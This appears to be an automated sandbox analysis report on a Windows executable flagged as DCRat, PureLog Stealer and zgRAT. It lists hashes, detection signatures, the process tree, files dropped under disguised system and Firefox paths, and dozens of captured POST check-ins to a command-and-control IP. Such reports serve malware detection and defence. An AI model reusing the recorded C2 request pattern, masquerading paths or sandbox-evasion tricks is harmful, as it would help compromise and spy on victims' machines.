Windows Analysis Report
4Osfx7gnSx.exe

Overview

General Information

Sample name: 4Osfx7gnSx.exe (renamed because original name is a hash value)
Original sample name: 0a0df93ba37270e35a35daaf3c1b1eab.exe
Analysis ID: 1408717
MD5: 0a0df93ba37270e35a35daaf3c1b1eab
SHA1: 20dfdfae4e2caab0c7baf06769de0b5ab8f3bc8d
SHA256: 74d236fe36375d9089df6ecc439bf91f291c89e241e1158e4752dc1dca4b1f66
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4Osfx7gnSx.exe (PID: 3524 cmdline: C:\Users\user\Desktop\4Osfx7gnSx.exe MD5: 0A0DF93BA37270E35A35DAAF3C1B1EAB)
    • cmd.exe (PID: 3032 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5508 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 4668 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
4Osfx7gnSx.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4Osfx7gnSx.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(3 more entries not shown)

Source | Rule | Description | Author | Strings
00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(2 more entries not shown)

Source | Rule | Description | Author | Strings
0.0.4Osfx7gnSx.exe.b20000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.4Osfx7gnSx.exe.b20000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\4Osfx7gnSx.exe, ProcessId: 3524, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe

Timestamp: 03/14/24-01:32:01.239975
SID: 2048095
Source Port: 49704
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 4Osfx7gnSx.exe | Avira: detected
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft.NET\Idle.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat | Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Program Files (x86)\Microsoft.NET\Idle.exe | ReversingLabs: Detection: 68%
Source: C:\Program Files (x86)\Microsoft.NET\Idle.exe | Virustotal: Detection: 58%
Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe | ReversingLabs: Detection: 68%
Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe | Virustotal: Detection: 58%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | ReversingLabs: Detection: 68%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | Virustotal: Detection: 58%
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | ReversingLabs: Detection: 68%
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Virustotal: Detection: 58%
Source: 4Osfx7gnSx.exe | ReversingLabs: Detection: 68%
Source: 4Osfx7gnSx.exe | Virustotal: Detection: 58%
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\Idle.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: 4Osfx7gnSx.exe | Joe Sandbox ML: detected
Source: 4Osfx7gnSx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\5940a34987c991
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Directory created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Directory created: C:\Program Files\Mozilla Firefox\fonts\9e8d7a4ca61bd9
Source: 4Osfx7gnSx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49704 -> 185.104.113.237:80
Source: Joe Sandbox View | ASN Name: ARTNET2PL ARTNET2PL
Source: global traffic | HTTP traffic detected:
  POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
  Host: 185.104.113.237
  Content-Length: 336
  Expect: 100-continue
  Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1276Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1276Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
